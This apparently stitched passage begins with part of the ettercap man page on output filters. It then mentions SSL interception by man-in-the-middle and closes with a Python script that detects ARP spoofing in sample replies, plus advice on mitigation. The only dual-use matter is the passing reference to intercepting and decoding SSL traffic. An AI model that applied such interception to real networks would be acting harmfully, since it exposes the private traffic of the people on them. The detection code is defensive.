              ebcdic Convert an EBCDIC text to ASCII.


              html   Strip all the html tags from the text.  A  tag  is  every
                     string between < and >.

                     example:

                     <title>This is the title</title>, but the following <b>will not</b> be displayed.

                     This is the title, but the following  will  not  be  dis-
                     played.


              utf8   Print  the  packets  in  UTF-8  format. The encoding used
                     while  performing  the  conversion  is  declared  in  the
                     etter.conf(5) file.

The trick is a man-in-the-middle attack ( Man in The Middle Attack ): the SSL traffic is intercepted and then decoded.
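From the defender's side, the ARP poisoning step is what leaves a footprint on the LAN: the gateway's IP address suddenly maps to a different MAC, and one MAC starts answering for several IPs. As an added example (not from the original post), this Python runs that detection logic over a constructed sample of ARP replies; the addresses follow the post's layout (gateway 192.168.1.254, client 192.168.1.2) and the MACs are made up.

```python
from collections import defaultdict

# Constructed sample of ARP replies as seen by a passive sniffer on the LAN,
# as (seconds, sender_ip, sender_mac). From t=2.0 a third host starts
# answering for the gateway address, and at t=4.0 for the client as well.
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.1.254", "00:11:22:33:44:55"),   # real gateway
    (1.0, "192.168.1.2",   "52:54:00:aa:bb:01"),   # real client
    (2.0, "192.168.1.254", "52:54:00:aa:bb:03"),   # gateway IP, different MAC
    (3.0, "192.168.1.254", "52:54:00:aa:bb:03"),
    (4.0, "192.168.1.2",   "52:54:00:aa:bb:03"),   # same MAC now claims the client
]

def detect_arp_spoofing(replies, trusted=None):
    """Return alerts for (a) an IP whose MAC differs from its first-seen or
    pinned binding and (b) one MAC answering for more than one IP.
    `trusted` pins known bindings such as the gateway so that a forged reply
    is caught even when it is the first one observed."""
    bindings = dict(trusted or {})
    ips_per_mac = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        known = bindings.setdefault(ip, mac)   # first sighting becomes the reference
        if known != mac:
            alerts.append((ts, "rebind", ip, known, mac))
        ips_per_mac[mac].add(ip)
        if len(ips_per_mac[mac]) > 1:
            alerts.append((ts, "multi-ip", mac, tuple(sorted(ips_per_mac[mac]))))
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_ARP_REPLIES):
        print(alert)
```

Pinning the gateway's MAC with a static ARP entry on the client, or dynamic ARP inspection on the switch, is the matching mitigation for the rebinding this detects.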